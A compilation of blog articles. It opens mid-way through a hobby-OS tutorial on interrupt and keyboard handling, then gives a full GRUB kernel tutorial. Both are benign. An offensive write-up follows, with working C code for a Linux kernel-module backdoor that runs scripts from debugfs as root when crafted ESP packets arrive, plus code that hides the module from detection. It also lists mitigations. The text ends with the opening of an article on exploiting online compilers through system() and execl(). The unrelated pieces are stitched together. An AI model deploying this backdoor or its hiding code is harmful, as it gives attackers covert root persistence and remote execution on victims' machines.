	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;

	load_idt(idt_ptr);
}

We implement the IDT as an array of IDT_entry structures. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Its vector offset. (ICW2)
* How the PICs are wired as master/slaves. (ICW3)
* Additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to inputs between each other. This is set up using ICW3, where each bit represents the cascading status for the corresponding IRQ. For now, we won’t use cascading and set all bits to zero.

ICW4 sets additional environmental parameters. We will just set the lowermost bit to tell the PICs we are running in 80x86 mode.

Tang ta dang !! PICs are now initialized.

 

Each PIC has an internal 8-bit register named the Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable and disable the nth IRQ line by setting the value of the nth bit in the IMR to 0 or 1 respectively. Reading from the data port returns the value in the IMR register, and writing to it sets the register. Here in our code, after initializing the PICs, we set all bits to 1, thereby disabling all IRQ lines. We will later enable the line corresponding to the keyboard interrupt. As of now, let’s disable all the interrupts !!

Now, if IRQ lines are enabled, our PICs can receive signals via the IRQ lines and convert them to interrupt numbers by adding the offset. Next, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1. This is input line 1 of PIC1. We have initialized PIC1 with an offset of 0x20 (see ICW2). To find the interrupt number, add 1 + 0x20, i.e. 0x21. So, the keyboard handler address has to be mapped against interrupt 0x21 in the IDT.

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consists of 64 bits. In the IDT entry for the interrupt, we do not store the entire address of the handler function together. We split it into 2 parts of 16 bits: the lower 16 bits are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the gate type, indicating that this entry handles an interrupt. We also need to give the kernel code segment offset. The GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment, so its offset is 0x08 (more on this would be too much for this article). The interrupt gate is represented by 0x8e. The remaining 8 bits in the middle have to be filled with zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.

Once the required mappings are done in the IDT, we have to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt takes one operand: a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straightforward. It contains the size of the IDT in bytes and its address. I have used an array to pack the values; you may also populate it using a struct, as sketched below.
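
A sketch of the struct variant (assuming a 32-bit build; this mirrors what the idt_ptr array packs, and note that strictly the limit field should be the size minus one):

struct idt_pointer {
	unsigned short limit;   /* size of the IDT in bytes */
	unsigned int base;      /* linear address of the IDT */
} __attribute__((packed));

/* inside idt_init(), instead of packing idt_ptr[] by hand: */
struct idt_pointer idtp;
idtp.limit = sizeof(struct IDT_entry) * IDT_SIZE;
idtp.base = (unsigned int)IDT;
load_idt((unsigned long *)&idtp);  /* same load_idt as below */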

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

load_idt:
	mov edx, [esp + 4]
	lidt [edx]
	sti
	ret

Additionally, the load_idt() function turns interrupts on using the sti instruction.

Once the IDT is set up and loaded, we can turn on keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
{
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);
}

 

Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via the IDT entry for interrupt 0x21.
So, every time you press a key on your keyboard you can be sure this function is called.

keyboard_handler:                 
	call    keyboard_handler_main
	iretd

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, however it’s much easier to write code in C than in assembly, so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to a program that was interrupted by an interrupt. This class of instructions pops the flags register that was pushed onto the stack when the interrupt call was made.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		if(keycode < 0)
			return;
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	
	}
}

We first signal an EOI (End Of Interrupt acknowledgment) by writing it to the PIC’s command port. Only after this will the PIC allow further interrupt requests. We have to read 2 ports here: the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, it means the buffer is empty and there is no data to read. Otherwise, we can read the data port 0x60. This port gives us the keycode of the key pressed; each keycode corresponds to a key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed to the screen using the same technique we used in the previous article.
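
For reference, a keyboard_map sketch consistent with the scope described here (scancode set 1, only a-z and 0-9 filled in; the actual header in the repo may differ):

unsigned char keyboard_map[128] = {
	/* 0x00-0x01: none, Esc */
	0, 0,
	/* 0x02-0x0B: top-row digits */
	'1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
	/* 0x0C-0x0F: -, =, Backspace, Tab (ignored here) */
	0, 0, 0, 0,
	/* 0x10-0x19: q..p */
	'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p',
	/* 0x1A-0x1D: [, ], Enter, LCtrl (ignored here) */
	0, 0, 0, 0,
	/* 0x1E-0x26: a..l */
	'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l',
	/* 0x27-0x2B: ;, ', `, LShift, backslash (ignored here) */
	0, 0, 0, 0, 0,
	/* 0x2C-0x32: z..m */
	'z', 'x', 'c', 'v', 'b', 'n', 'm',
	/* everything else defaults to 0 */
};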

In this article, for the sake of brevity, I am only handling lowercase a-z and digits 0-9. You can easily extend this to include special characters, ALT, SHIFT and CAPS LOCK. You can tell whether a key was pressed or released from the scancode (the high bit is set on release) and perform the desired action. You can also map any combination of keys to special functions such as shutdown.

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support

 

References and Thanks

  1. wiki.osdev.org
  2. osdever.net

 

 

Let’s write a Kernel

original text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well-defined values after power-on. The Instruction Pointer (EIP) register holds the memory address of the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is, in fact, the last 16 bytes of the 32-bit address space. This memory address is called the reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution.  BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. (whether bytes 511 and 512 of first sector are 0xAA55)

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
* NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code

Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32-bit mode. It is not strictly required in our example, but it is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive that makes symbols from the source code global. By doing so, the linker knows where the symbol start is, which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can wake the CPU from an hlt instruction, so we disable interrupts beforehand using the cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loop clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory-mapped I/O for the screen starts at 0xb8000 and supports 25 lines, each containing 80 ASCII characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.
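
As code, that green-on-black example would be (a sketch; the kernel below uses attribute 0x07 instead):

char *vidptr = (char*)0xb8000; /* start of text-mode video memory */
vidptr[0] = 's';               /* ASCII code of the character */
vidptr[1] = 0x02;              /* attribute byte: black background, green foreground */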

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at the beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that the kernel's code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have a look at the next line: .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter becomes 0x100000 plus the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then-current values of the location counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader, called the Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as the Multiboot header) within its first 8 kilobytes.

Further, this Multiboot header must contain three fields that are 4-byte aligned, namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

dd defines a doubleword (4 bytes). The checksum is chosen so that magic + flags + checksum wraps around to zero.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The -c option makes sure that after compiling, linking doesn't happen implicitly.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you'll see a boot menu with the name of your kernel listed.

Select it and you should see the string "my first kernel" printed on the screen.

That’s your kernel!!

 

PS:

* It's always advisable to get yourself a virtual machine for all kinds of kernel hacking.
* To run this on grub2, which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.


Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.
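For reference, the prototypes of those three functions (as declared in <linux/debugfs.h>; exact signatures vary a little between kernel versions) look roughly like this:

/* Rough prototypes from <linux/debugfs.h> (kernel-version dependent) */
bool debugfs_initialized(void);

struct dentry *debugfs_create_blob(const char *name, umode_t mode,
                                   struct dentry *parent,
                                   struct debugfs_blob_wrapper *blob);

void debugfs_remove(struct dentry *dentry);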

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

#include <linux/debugfs.h>	/* debugfs_create_blob, struct debugfs_blob_wrapper */
#include <linux/slab.h>	/* kmalloc, kfree */
#include <linux/string.h>	/* strlen */

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrap an error check around it just to be sure, and it's three lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone's badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet "mangling".

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.
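For completeness, registering a hook at that stage looks roughly like the sketch below. This is not the article's code: it uses the 4.13+ API (nf_register_net_hook and the newer three-argument hook signature), while older kernels use nf_register_hook and a hook prototype closer to the one shown below in the Netfilter Code section.

#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <net/net_namespace.h>

/* Hypothetical hook; on 4.13+ the signature is (priv, skb, state). */
static unsigned int watch_esp(void *priv, struct sk_buff *skb,
                              const struct nf_hook_state *state)
{
        /* inspect skb here, then let the packet continue on its way */
        return NF_ACCEPT;
}

static struct nf_hook_ops esp_ops = {
        .hook     = watch_esp,
        .pf       = NFPROTO_IPV4,
        .hooknum  = NF_INET_PRE_ROUTING,  /* earliest IPv4 stage */
        .priority = NF_IP_PRI_FIRST,
};

static int __init esp_init(void)
{
        return nf_register_net_hook(&init_net, &esp_ops);
}

static void __exit esp_exit(void)
{
        nf_unregister_net_hook(&init_net, &esp_ops);
}

module_init(esp_init);
module_exit(esp_exit);
MODULE_LICENSE("GPL");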

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren't terribly important, so let's move on to the one you need: struct sk_buff *skb. sk_buffs get a little complicated, so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}
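The check above assumes esp_header already points at the ESP header. One way to obtain it (a sketch, not the article's exact code) is to step past the IP header by hand, since in PRE_ROUTING the transport header offset may not be set yet; struct ip_esp_hdr comes from the kernel's UAPI headers and exposes spi, seq_no, and enc_data:

struct ip_esp_hdr *esp_header;

/* The ESP header sits right after the IPv4 header; ihl is in 32-bit words. */
esp_header = (struct ip_esp_hdr *)((unsigned char *)ip_header +
                                   (ip_header->ihl * 4));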

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks run in a softirq context, which makes them very fast but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently, but the hook cannot sleep, so work that might (such as calling call_usermodehelper) has to be deferred out of interrupt context using delayed workqueues, as seen in state.c.
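A minimal sketch of that deferral (with assumed names, not the article's state.c) looks like this: the hook only schedules the work, and the work function, which runs later in process context, is the one that calls execute_file():

#include <linux/workqueue.h>

static void exec_work_fn(struct work_struct *work)
{
	/* Runs in process context, so sleeping calls like
	 * call_usermodehelper() are safe here. */
	execute_file();
}

static DECLARE_DELAYED_WORK(exec_work, exec_work_fn);

/* Called from the Netfilter hook when the trigger packet is seen;
 * this is softirq-safe because it only queues the work. */
static void schedule_execution(void)
{
	schedule_delayed_work(&exec_work, 0);
}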

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that starts with an interpreter directive (python, ruby, perl, etc.) works when invoked via call_usermodehelper. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it's arguably not entirely in RAM: go run has to create a temporary file to build the program, and it requires the .go file extension, which makes this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the listing below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.”

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Take full control of online compilers through a common exploit

Online compilers are a handy tool to save time and resources for coders, and are freely available for a variety of programming languages. They are useful for learning a new language and developing simple programs, such as the ubiquitous “Hello World” exercise. I often use online compilers when I am out, so that I don’t have to worry about locating and downloading all of the resources myself.

Since these online tools are essentially remote compilers with a web interface, I realized that I might be able to take remote control of the machines through command injection. My research identified a common weakness in many compilers: inadequate sanitization of user-submitted code prior to execution. My analysis revealed that this lack of input filtering enables exploits that a hacker can use to take control of the machine or deliberately cause it to crash.

A clever attacker can exploit built-in C functions and POSIX libraries to gain control over the computer hosting the online compiler. Functions like execl(), system(), and getenv() can be used to probe the target machine's operating system and run any command in its built-in shell.

